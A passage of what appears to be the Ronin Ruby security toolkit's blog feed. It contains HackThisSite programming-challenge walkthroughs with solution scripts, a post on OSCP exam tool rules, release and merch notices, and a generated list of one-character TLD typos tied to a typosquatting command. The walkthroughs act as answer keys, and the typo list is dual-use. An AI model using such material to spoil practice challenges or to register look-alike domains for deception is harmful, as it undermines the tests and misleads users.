<p>Next we will need to write the Ruby script which will send an HTTP <code class="language-plaintext highlighter-rouge">GET</code> request
with our session cookie to the challenge page at <code class="language-plaintext highlighter-rouge">/missions/prog/11/</code>,
scrape the randomly generated numbers, calculate the answer, and then send an
HTTP <code class="language-plaintext highlighter-rouge">POST</code> request also with our session cookie to the form end-point at
<code class="language-plaintext highlighter-rouge">/missions/prog/11/index.php</code>.</p>
<p>For the script, we will use the <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> library which adds a bunch of
helper methods and makes performing HTTP requests much easier. Note
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> is a dependency of <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> and should already be installed.</p>
<p>The solution to the challenge is basically to subtract the random <code class="language-plaintext highlighter-rouge">Shift</code>
number from each of the randomly generated numbers, then convert each resulting
number to an ASCII character, and join the ASCII characters into a String.
Note however that the randomly generated numbers are separated by a random
non-numeric deliminator character, such as <code class="language-plaintext highlighter-rouge">%</code>, <code class="language-plaintext highlighter-rouge">"</code>, <code class="language-plaintext highlighter-rouge">$</code>, etc. In order to
extract only the numbers from the randomly generated string of numbers,
we can use the <a href="https://rubydoc.info/stdlib/core/String#scan-instance_method">String#scan</a> method with the <code class="language-plaintext highlighter-rouge">/\d+/</code> regex to return an Array
containing only the numeric strings.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env ruby</span>
<span class="nb">require</span> <span class="s1">'ronin/support'</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Support</span>
<span class="c1"># build the session cookie</span>
<span class="n">session_id</span> <span class="o">=</span> <span class="no">ENV</span><span class="p">[</span><span class="s1">'SESSION_ID'</span><span class="p">]</span>
<span class="n">session_cookie</span> <span class="o">=</span> <span class="s2">"HackThisSite=</span><span class="si">#{</span><span class="n">session_id</span><span class="si">}</span><span class="s2">"</span>
<span class="c1"># create a persistent HTTP connection to www.hackthissite.org:443</span>
<span class="n">http</span> <span class="o">=</span> <span class="n">http_connect_uri</span><span class="p">(</span><span class="s1">'https://www.hackthissite.org'</span><span class="p">,</span> <span class="ss">cookie: </span><span class="n">session_cookie</span><span class="p">)</span>
<span class="c1"># get the challenge page</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s1">'/missions/prog/11/'</span><span class="p">)</span>
<span class="c1"># check the response</span>
<span class="k">unless</span> <span class="n">response</span><span class="p">.</span><span class="nf">code</span> <span class="o">==</span> <span class="s1">'200'</span>
<span class="n">print_error</span> <span class="s2">"could not request webpage: HTTP </span><span class="si">#{</span><span class="n">response</span><span class="p">.</span><span class="nf">code</span><span class="si">}</span><span class="s2">"</span>
<span class="nb">exit</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">end</span>
<span class="c1"># find the randomly generated numbers after "Generated String: "</span>
<span class="k">unless</span> <span class="p">(</span><span class="n">match</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="sr">/Generated String:\s+([^<]+)/</span><span class="p">))</span>
<span class="n">print_error</span> <span class="s2">"could not find 'Generated String:' in response body"</span>
<span class="nb">exit</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">end</span>
<span class="c1"># extract the randomly generated numbers</span>
<span class="n">generated_string</span> <span class="o">=</span> <span class="n">match</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">generated_numbers</span> <span class="o">=</span> <span class="n">generated_string</span><span class="p">.</span><span class="nf">scan</span><span class="p">(</span><span class="sr">/\d+/</span><span class="p">).</span><span class="nf">map</span><span class="p">(</span><span class="o">&</span><span class="ss">:to_i</span><span class="p">)</span>
<span class="c1"># find the random Shift number</span>
<span class="k">unless</span> <span class="p">(</span><span class="n">match</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="sr">/Shift:\s+(-?\d+)/</span><span class="p">))</span>
<span class="n">print_error</span> <span class="s2">"could not find 'Generated Shift:' in response body"</span>
<span class="nb">exit</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">end</span>
<span class="c1"># extract the Shift number</span>
<span class="n">shift</span> <span class="o">=</span> <span class="n">match</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">to_i</span>
<span class="c1"># debugging</span>
<span class="n">print_info</span> <span class="s2">"Generated Numbers: </span><span class="si">#{</span><span class="n">generated_numbers</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span>
<span class="n">print_info</span> <span class="s2">"Shift: </span><span class="si">#{</span><span class="n">shift</span><span class="si">}</span><span class="s2">"</span>
<span class="c1"># subtract Shift from each number, convert each number to a ASCII char, and join</span>
<span class="n">shifted_numbers</span> <span class="o">=</span> <span class="n">generated_numbers</span><span class="p">.</span><span class="nf">map</span> <span class="p">{</span> <span class="o">|</span><span class="n">number</span><span class="o">|</span> <span class="n">number</span> <span class="o">-</span> <span class="n">shift</span> <span class="p">}</span>
<span class="n">decoded_ascii</span> <span class="o">=</span> <span class="n">shifted_numbers</span><span class="p">.</span><span class="nf">map</span><span class="p">(</span><span class="o">&</span><span class="ss">:chr</span><span class="p">).</span><span class="nf">join</span>
<span class="c1"># debugging</span>
<span class="n">print_info</span> <span class="s2">"Answer: </span><span class="si">#{</span><span class="n">decoded_ascii</span><span class="si">}</span><span class="s2">"</span>
<span class="c1"># submit the answer!</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="s1">'/missions/prog/11/index.php'</span><span class="p">,</span> <span class="ss">referer: </span><span class="s1">'https://www.hackthissite.org/missions/prog/11/'</span><span class="p">,</span>
<span class="ss">form_data: </span><span class="p">{</span><span class="ss">solution: </span><span class="n">decoded_ascii</span><span class="p">})</span>
<span class="c1"># check the response</span>
<span class="k">unless</span> <span class="n">response</span><span class="p">.</span><span class="nf">code</span> <span class="o">==</span> <span class="s1">'200'</span>
<span class="n">print_error</span> <span class="s2">"failed to successfully submit the form: HTTP </span><span class="si">#{</span><span class="n">response</span><span class="p">.</span><span class="nf">code</span><span class="si">}</span><span class="s2">"</span>
<span class="nb">exit</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">end</span>
<span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">.</span><span class="nf">include?</span><span class="p">(</span><span class="s1">'Sorry:'</span><span class="p">)</span>
<span class="n">print_error</span> <span class="s2">"incorrect solution!"</span>
<span class="nb">exit</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">else</span>
<span class="n">print_success</span> <span class="s2">"Congratz!"</span>
<span class="k">end</span>
</code></pre></div></div>
<p>Also note that the <a href="https://hackthissite.org">HackThisSite</a> form end-point also expects a <code class="language-plaintext highlighter-rouge">Referer</code>
header.</p>
<p>To run the Ruby script:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">SESSION_ID</span><span class="o">=</span><span class="s2">"..."</span>
ruby solution.rb
</code></pre></div></div>
<p>Which should print the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[*] Generated Numbers: 36 40 70 57 30 29 69 62 32 28
[*] Shift: -17
[*] Answer: 59WJ/.VO1-
[+] Congratz!
</code></pre></div></div>
<p>Now, if you check your profile page shows, it should show that you have solved
<code class="language-plaintext highlighter-rouge">Programming: (11)</code>.</p>
Solving HackThisSite Programming Level 1 with Ronin2023-11-24 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/11/24/solving-hackthissite-programming-level-1-with-ronin.html<p><a href="https://www.hackthissite.org/missions/prog/1/">HackThisSite Programming Level 1</a> gives you a link to a <a href="https://www.hackthissite.org/missions/prog/1/wordlist.zip">wordlist.zip</a> file
and a list of scrambled words. Your task is to translate the scrambled words
back into their original words from the wordlist.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>This level is about unscrambling words.
Find the original (unscrambled) words, which were randomly taken from a wordlist.<--
Send a comma separated list of the original words, in the same order as in the list below.
You have 30 seconds time to send the solution.
List of scrambled words:
* onraold
* sxwzqa
* rynoelsd
* rtokenw
* reauli
* yekuslb
* sfufyrc
* pa1yph
* mnyrila
* ppeenoel
</code></pre></div></div>
<p>First we must download the <a href="https://www.hackthissite.org/missions/prog/1/wordlist.zip">wordlist.zip</a> file.</p>
<p>Next we will write a Ruby script that reads the wordlists, build a lookup table,
read in the scrambled words, translate them, and print the correctly formatted
answer. To read the wordlist file, we will use <a href="https://github.com/postmodern/wordlist.rb#readme">wordlist</a> Ruby
library which can read compressed wordlist zip archives directly. Note that
<a href="https://github.com/postmodern/wordlist.rb#readme">wordlist</a> is a dependency of <a href="https://github.com/ronin-rb/ronin#readme">ronin</a>, so it should already be
installed.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env ruby</span>
<span class="nb">require</span> <span class="s1">'wordlist'</span>
<span class="c1">#</span>
<span class="c1"># Takes a word and sorts it's characters.</span>
<span class="c1">#</span>
<span class="k">def</span> <span class="nf">sorted</span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="n">word</span><span class="p">.</span><span class="nf">chars</span><span class="p">.</span><span class="nf">sort</span><span class="p">.</span><span class="nf">join</span>
<span class="k">end</span>
<span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="s1">'wordlist.zip'</span><span class="p">)</span>
<span class="n">sorted_words</span> <span class="o">=</span> <span class="p">{}</span>
<span class="c1"># build the lookup table</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span>
<span class="n">sorted_words</span><span class="p">[</span><span class="n">sorted</span><span class="p">(</span><span class="n">word</span><span class="p">)]</span> <span class="o">=</span> <span class="n">word</span>
<span class="k">end</span>
<span class="c1"># read input until EOF</span>
<span class="n">input</span> <span class="o">=</span> <span class="nb">readlines</span><span class="p">(</span><span class="ss">chomp: </span><span class="kp">true</span><span class="p">)</span>
<span class="c1"># translate the input</span>
<span class="n">answer</span> <span class="o">=</span> <span class="n">input</span><span class="p">.</span><span class="nf">map</span> <span class="p">{</span> <span class="o">|</span><span class="n">scrambled_word</span><span class="o">|</span>
<span class="n">sorted_words</span><span class="p">[</span><span class="n">sorted</span><span class="p">(</span><span class="n">scrambled_word</span><span class="p">)]</span>
<span class="p">}.</span><span class="nf">join</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span>
<span class="c1"># print the answer</span>
<span class="nb">puts</span> <span class="n">answer</span>
</code></pre></div></div>
<p>Running the script and copy/pasting the random scrambled words gives us the
answer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ruby unsort_words.rb
onraold
sxwzqa
rynoelsd
rtokenw
reauli
yekuslb
sfufyrc
pa1yph
mnyrila
ppeenoel
^D
orlando,qwaszx,reynolds,network,laurie,bluesky,scruffy,happy1,marilyn,penelope
</code></pre></div></div>
<p>Finally, copy/paste the answer into the text box and click Submit.</p>
Yes, you can use Ronin on the OSCP2023-11-22 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/11/22/yes-you-can-use-ronin-on-the-oscp.html<p>Many who have taken or are studying for the <a href="https://www.offsec.com/courses/pen-200/">OSCP Exam</a> know that you are
not allowed to use Metasploit on the exam, except for one challenge.
This is because the OSCP <a href="https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions">exam restrictions</a> forbid the use of any
“automatic exploitation” tools (ex: Metasploit, SQLmap, etc).
Such tools are considered “automatic exploitation” tools because they can
automatically find <em>and</em> exploit vulnerabilities without any user interaction
(ex: Metasploit’s <code class="language-plaintext highlighter-rouge">db_autopwn</code> command). The purpose of the <a href="https://www.offsec.com/courses/pen-200/">OSCP Exam</a> is to
test how well you can find and exploit vulnerabilities on your own,
not how well you can use <code class="language-plaintext highlighter-rouge">db_autopwn</code>.</p>
<p>However, Ronin does not provide any “automatic exploitation” functionality,
which can scan, fingerprint services, identify vulnerabilities, <em>and</em> exploit
them, automatically without <em>any</em> user interaction. Instead, using Ronin one
would have to perform each step manually with <a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a>, <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> /
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a>, etc.</p>
<p>Just to be sure, I emailed the OSCP staff and asked for clarification on what
is and is not considered “automatic exploitation”; for example is running a
Python exploit considered “automatic exploitation”?</p>
<p>Here is their response:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Subject: [OffSec] Re: clarification on banned tools
From: Support <challenges@offensive-security.com>
##- Please type your reply above this line -##
Hi Postmodern,
This message (287391) has been updated. To add additional comments, please reply to this email.
----------------------------------------------
Offensive Security, Nov 9, 2023, 08:24 UTC
Hello,
Thank you for your email.
If a tool is capable of automatically discovering and exploiting vulnerabilities on a target machine resulting in automatic remote access or
escalated privileges without effort or enumeration, it can be considered a restricted tool.
To further elaborate on the above, we highly recommend reading the below blog post regarding automated exploitation tools.
- Understanding the tools/scripts you use in a Pentest
Furthermore, please also keep in mind that there are many tools and unfortunately, we are unable to comment on all of them.
Therefore, it is up to the student to determine if their chosen tool or script falls under a restricted category.
This also demonstrates that you understand what the tool is doing and how it works.
Keep us updated if you require any additional information.
Sincerely,
The OffSec Team
www.offsec.com
</code></pre></div></div>
<p>So yes, you <em>can</em> use Ronin on the <a href="https://www.offsec.com/courses/pen-200/">OSCP Exam</a>, because it does not provide any
“automatic exploitation” features and forces you to think about what steps you
want to perform.</p>
Ronin is now on LinkedIn2023-11-08 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/11/08/ronin-is-now-on-linkedin.html<p>To better reach more business-minded people, I decided to create the
<a href="https://linkedin.com/groups/14347104">Ronin-rb</a> group on <a href="https://www.linkedin.com/">LinkedIn</a> for posting content about Ronin.
If you are a LinkedIn user, feel free to join the group and repost any
<a href="https://linkedin.com/groups/14347104">Ronin-rb</a> posts.</p>
Ronin is participating in Hacktoberfest 2023!2023-09-26 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/09/26/ronin-is-participating-in-hacktoberfest-2023.html<p>Ronin is participating in <a href="https://hacktoberfest.com/">Hacktoberfest 2023</a>! Hacktoberfest is
DigitalOcean’s annual online event during the month of October, which
encourages people to contribute to Open Source projects that choose to
participate in Hacktoberfest.</p>
<p>In addition to the <a href="https://hacktoberfest.com/about/#digital-rewards">Digital Rewards</a> that Hacktoberfest is offering to
participants, Ronin is also offering <a href="https://merch.ronin-rb.dev/category/stickers">free stickers</a> to those
who successfully submit a PR to <a href="https://github.com/ronin-rb">Ronin</a> <em>and</em> get it accepted.</p>
<p>If you wish to participate in Hacktoberfest 2023 by contributing to
<a href="https://github.com/ronin-rb">Ronin</a>, here is what you need to do:</p>
<ol>
<li><a href="https://hacktoberfest.com/auth/">Register for Hacktoberfest 2023</a></li>
<li>Join the <a href="https://discord.gg/Cw5WWnycRH">Ronin Discord</a>.</li>
<li>Take a look at <a href="https://github.com/search?q=org%3Aronin-rb+state%3Aopen+&type=issues">Ronin’s issues</a>, particularly issues tagged
with the <a href="https://github.com/search?q=org%3Aronin-rb+state%3Aopen+label%3Ahelp-wanted&type=issues">help-wanted</a> or
<a href="https://github.com/search?q=org%3Aronin-rb+state%3Aopen+label%3A%22good+first+issue%22&type=issues">good-first-issue</a> labels.</li>
<li>Try working on an issue.</li>
<li>Submit a PR.</li>
</ol>
<p>Hacktoberfest officially starts on <strong>September 26</strong> and officially ends on
<strong>October 31st</strong>.</p>
ronin 2.0.5, ronin-support 1.0.3, ronin-db-activerecord 0.1.2, ronin-db 0.1.2, ronin-vulns 0.1.4, ronin-payloads 0.1.4, and ronin-exploits 1.0.3 released!2023-09-19 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/09/19/ronin-2-0-5-released.html<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://github.com/ronin-rb/ronin/releases/tag/v2.0.5">2.0.5</a>,
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://github.com/ronin-rb/ronin-support/releases/tag/v1.0.3">1.0.3</a>,
<a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a> <a href="https://github.com/ronin-rb/ronin-db-activerecord/releases/tag/v0.1.2">0.1.2</a>,
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> <a href="https://github.com/ronin-rb/ronin-support/releases/tag/v0.1.2">0.1.2</a>,
<a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a> <a href="https://github.com/ronin-rb/ronin-vulns/releases/tag/v0.1.4">0.1.4</a>,
<a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> <a href="https://github.com/ronin-rb/ronin-payloads/releases/tag/v0.1.4">0.1.4</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> <a href="https://github.com/ronin-rb/ronin-exploits/releases/tag/v1.0.3">1.0.3</a>
have been released. These new releases are patch releases and mainly contain
minor bugs fixes and documentation fixes.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
We now have Merch!2023-09-05 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/09/05/we-now-have-merch.html<p>Ronin now has a <a href="https://merch.ronin-rb.dev/">Merch store</a>! Get some <a href="https://merch.ronin-rb.dev/category/stickers">Ronin stickers</a> or a
<a href="https://merch.ronin-rb.dev/product/ronin-t-shirt">Ronin t-shirt</a>, and help support Ronin!</p>
<p><a href="https://merch.ronin-rb.dev/product/ronin-logo-sticker"><img src="https://assets.bigcartel.com/product_images/363599074/ronin_logo_sticker_demo.png" alt="Ronin logo sticker" /></a></p>
<p><a href="https://merch.ronin-rb.dev/product/ronin-laptop-badge"><img src="https://assets.bigcartel.com/product_images/363600370/ronin_sticker_hexagon_r_demo.png" alt="Ronin hexagon stickers" /></a></p>
<p><a href="https://merch.ronin-rb.dev/product/ronin-t-shirt"><img src="https://assets.bigcartel.com/product_images/365209507/unisex-staple-t-shirt-black-left-front-64bcf5c3cba77.png?auto=format&fit=max&w=1000" alt="Ronin t-shirt" /></a></p>
Ronin is now on Patreon as well2023-09-03 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/09/03/ronin-is-now-on-patreon-as-well.html<p>Ronin is now accepting donations on <a href="https://www.patreon.com/roninrb">Patreon</a>.</p>
<p>I figured that many people probably already have a <a href="https://www.patreon.com/signup">Patreon
account</a> and might not want to sign-up for
<a href="https://opencollective.com/create-account">Open Collective</a> just to donate to Ronin,
so I also created a <a href="https://www.patreon.com/roninrb">Patreon page for Ronin</a>. You can choose from
the following donation tiers:</p>
<ul>
<li><a href="https://www.patreon.com/roninrb/membership">$1 / month</a></li>
<li><a href="https://www.patreon.com/roninrb/membership">$5 / month</a></li>
<li><a href="https://www.patreon.com/roninrb/membership">$10 / month</a></li>
<li><a href="https://www.patreon.com/roninrb/membership">$20 / month</a></li>
</ul>
<p>Now you can donate via <a href="https://github.com/sponsors/ronin-rb">GitHub</a>, via <a href="https://www.patreon.com/roninrb">Patreon</a>, or directly via
<a href="https://opencollective.com/ronin-rb">Open Collective</a>. Help support a Free and Open Source Ruby Security project
and donate today!</p>
ronin 2.0.4 and ronin-core 0.1.2 released!2023-07-18 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/07/18/ronin-2-0-4-released.html<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://github.com/ronin-rb/ronin/releases/tag/v2.0.4">2.0.4</a> and
<a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> <a href="https://github.com/ronin-rb/ronin-core/releases/tag/v0.1.2">0.1.2</a> have been released.
These releases include minor bug fixes to the <code class="language-plaintext highlighter-rouge">ronin typosquat</code>, <code class="language-plaintext highlighter-rouge">ronin host</code>,
and <code class="language-plaintext highlighter-rouge">ronin irb</code> commands.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
Finding all TLD typos using Ruby and ronin-support2023-07-17 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/07/17/finding-tld-typos-using-ronin-support.html<p>You may have recently read a <a href="https://www.bbc.com/news/world-us-canada-66226873">news story</a> about how a typo in a US military
email address (<code class="language-plaintext highlighter-rouge"><mailbox>@<domain>.mil</code> -> <code class="language-plaintext highlighter-rouge"><mailbox>@<domain>.ml</code>) accidentally
caused sensitive military secrets to be sent to a similar Mali email address
for years; Mali is apparently a Russian ally.</p>
<p>What if I told you, you could use Ronin to find all of the one-character-missing
valid typos for all of the TLDs? The <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> library comes with a
<a href="/docs/ronin-support/Ronin/Support/Network/TLD.html">Ronin::Support::Network::TLD</a> module which can automatically download and parse
ICANN’s TLD list. Using the TLD list we can generate typos for each TLD and
filter out the invalid typoed TLDs.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">require</span> <span class="s1">'ronin/support/network/tld'</span>
<span class="k">def</span> <span class="nf">omit_each_char</span><span class="p">(</span><span class="n">tld</span><span class="p">)</span>
<span class="k">return</span> <span class="n">enum_for</span><span class="p">(</span><span class="n">__method__</span><span class="p">,</span><span class="n">tld</span><span class="p">)</span> <span class="k">unless</span> <span class="nb">block_given?</span>
<span class="n">tld</span><span class="p">.</span><span class="nf">length</span><span class="p">.</span><span class="nf">times</span> <span class="k">do</span> <span class="o">|</span><span class="n">i</span><span class="o">|</span>
<span class="n">new_tld</span> <span class="o">=</span> <span class="n">tld</span><span class="p">.</span><span class="nf">dup</span>
<span class="n">new_tld</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">yield</span> <span class="n">new_tld</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="n">tlds</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Support</span><span class="o">::</span><span class="no">Network</span><span class="o">::</span><span class="no">TLD</span><span class="p">.</span><span class="nf">list</span>
<span class="n">typoed_tlds</span> <span class="o">=</span> <span class="n">tlds</span><span class="p">.</span><span class="nf">to_h</span> <span class="k">do</span> <span class="o">|</span><span class="n">tld</span><span class="o">|</span>
<span class="p">[</span><span class="n">tld</span><span class="p">,</span> <span class="n">omit_each_char</span><span class="p">(</span><span class="n">tld</span><span class="p">).</span><span class="nf">select</span> <span class="p">{</span> <span class="o">|</span><span class="n">typoed_tld</span><span class="o">|</span>
<span class="n">tlds</span><span class="p">.</span><span class="nf">include?</span><span class="p">(</span><span class="n">typoed_tld</span><span class="p">)</span>
<span class="p">}]</span>
<span class="k">end</span>
<span class="n">typoed_tlds</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">tld</span><span class="p">,</span><span class="n">valid_typos</span><span class="o">|</span>
<span class="k">unless</span> <span class="n">valid_typos</span><span class="p">.</span><span class="nf">empty?</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">tld</span><span class="si">}</span><span class="s2"> -> </span><span class="si">#{</span><span class="n">valid_typos</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="s1">', '</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span>
<span class="k">end</span>
<span class="k">end</span>
</code></pre></div></div>
<p>This gives us the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aco -> co, ao, ac
ads -> as, ad
aeg -> eg, ag, ae
afl -> al, af
aig -> ag, ai
anz -> nz, az
aol -> al, ao
art -> at, ar
arte -> art
audio -> audi
autos -> auto
aws -> ws, as, aw
axa -> ax
bar -> ar, br, ba
bbc -> bb
bbt -> bt, bt, bb
bcg -> cg, bg
bcn -> cn, bn
best -> bet
bet -> et, bt, be
bid -> id, bd, bi
bing -> ing
bingo -> bing
bio -> io, bo, bi
biz -> bz, bi
bms -> ms, bs, bm
bmw -> mw, bw, bm
bom -> om, bm, bo
boo -> bo, bo
book -> boo
bot -> bt, bo
box -> bo
buy -> uy, by
bzh -> bh, bz
cab -> ca
cal -> al, cl, ca
call -> cal, cal
cam -> am, cm, ca
camp -> cam
car -> ar, cr, ca
cards -> cars
care -> car
careers -> career
cars -> crs, car
cat -> at, ca
cba -> ba, ca
cbn -> bn, cn
cbs -> bs
ceo -> co
cfa -> ca, cf
cfd -> cd, cf
channel -> chanel, chanel
chase -> case
chat -> cat
citic -> citi
com -> om, cm, co
coupons -> coupon
cpa -> pa, ca
crs -> rs, cr
cruises -> cruise
cyou -> you
dad -> ad
deals -> deal
dev -> de
dnp -> np
dog -> do
dot -> do
dtv -> tv
eat -> at, et
eco -> co, ec
edu -> eu
esq -> es
eus -> us, es, eu
fans -> fan
fit -> it, fi
fly -> ly
foo -> fo, fo
food -> foo
fox -> fo
frl -> fr
ftr -> tr, fr
fund -> fun
fyi -> fi
gal -> al, gl, ga
games -> game
gap -> gp, ga
gay -> gy, ga
gbiz -> biz
gdn -> gn, gd
gea -> ga, ge
gifts -> gift
gle -> ge, gl
gmo -> mo, gm
gmx -> mx, gm
goog -> goo
gop -> gp
got -> gt
hbo -> bo
hkt -> ht, hk
host -> hot
hot -> ht
ibm -> bm, im
ice -> ie
icu -> cu
ifm -> fm, im
inc -> nc, in
ing -> ng, in
ink -> in
int -> it, in
ist -> st, it, is
itv -> tv, it
jio -> io, jo
jmp -> mp, jp, jm
jot -> jo
joy -> jo
kfh -> kh
kia -> ki
kim -> im, km, ki
kpn -> pn, kn, kp
krd -> kr
kred -> red, krd
lat -> at, lt, la
law -> aw, la
lds -> ls
link -> ink
llc -> lc, lc
loans -> loan
lpl -> pl
ltd -> td, lt
ltda -> ltd
man -> mn, ma
map -> mp, ma
markets -> market
mba -> ba, ma
med -> md, me
men -> mn, me
menu -> men
mil -> il, ml
mint -> int, mit
mit -> it, mt
mlb -> lb, ml
mls -> ls, ms, ml
mma -> ma, ma, mm
mobi -> obi, moi
moe -> me, mo
moi -> mo
mom -> om, mm, mo
mov -> mv, mo
msd -> sd, md, ms
mtn -> tn, mn, mt
mtr -> tr, mr, mt
nab -> na
nba -> ba, na
nec -> ec, nc, ne
net -> et, ne
new -> ne
news -> new
next -> net
nfl -> nl, nf
ngo -> no, ng
nhk -> hk
now -> no
nra -> na, nr
nrw -> rw, nr
ntt -> tt
nyc -> nc
obi -> bi
one -> ne
ong -> ng
onl -> nl
ott -> tt
paris -> pars
parts -> pars
pay -> py, pa
pet -> et, pt, pe
phd -> ph
photos -> photo
pid -> id
pin -> in, pn
ping -> ing, pin
pink -> ink, pin
play -> pay
pnc -> nc, pn
pro -> ro, pr
prod -> pro
prof -> pro
pru -> ru, pr
pwc -> pw
read -> red
red -> re
reisen -> reise
ren -> re
rent -> ren
reviews -> review
ricoh -> rich
ril -> il
rio -> io, ro
run -> ru
rwe -> re, rw
sap -> sa
sarl -> srl
sas -> as, ss, sa
sbi -> bi, si, sb
sbs -> bs, ss, sb
sca -> ca, sa, sc
scb -> sb, sc
seat -> eat
sew -> se
sex -> sx, se
sexy -> sex
sfr -> fr, sr
show -> how
ski -> ki, si, sk
skin -> ski
sky -> ky, sy, sk
song -> ong
sony -> soy
soy -> sy, so
spa -> pa, sa
sport -> spot
srl -> sl, sr
stc -> tc, sc, st
swatch -> watch
tax -> ax
taxi -> tax
tci -> ci, tc
tdk -> dk, tk, td
tel -> tl
thd -> td, th
tjx -> tj
top -> to
trv -> tv, tr
tvs -> tv
ubank -> bank
ubs -> bs, us
uno -> no
ups -> ps, us
vet -> et, ve
vig -> vg, vi
vin -> in, vn, vi
vip -> vi
wien -> win
win -> in
wine -> win
wme -> me
works -> work
wtc -> tc
wtf -> tf, wf
xbox -> box
xin -> in
zone -> one
</code></pre></div></div>
<p>This is just one example of the many useful things one can do with Ronin and
it’s libraries, only in a couple lines of Ruby. Enjoy.</p>
<p><strong>PS:</strong> you may also be interested in the
<a href="/docs/ronin-support/Ronin/Support/Network/PublicSuffix.html">Ronin::Support::Network::PublicSuffix</a> and
<a href="/docs/ronin-support/Ronin/Support/Text/Typo.html">Ronin::Support::Text::Typo</a> modules or the <code class="language-plaintext highlighter-rouge">ronin typosquat</code> command.</p>
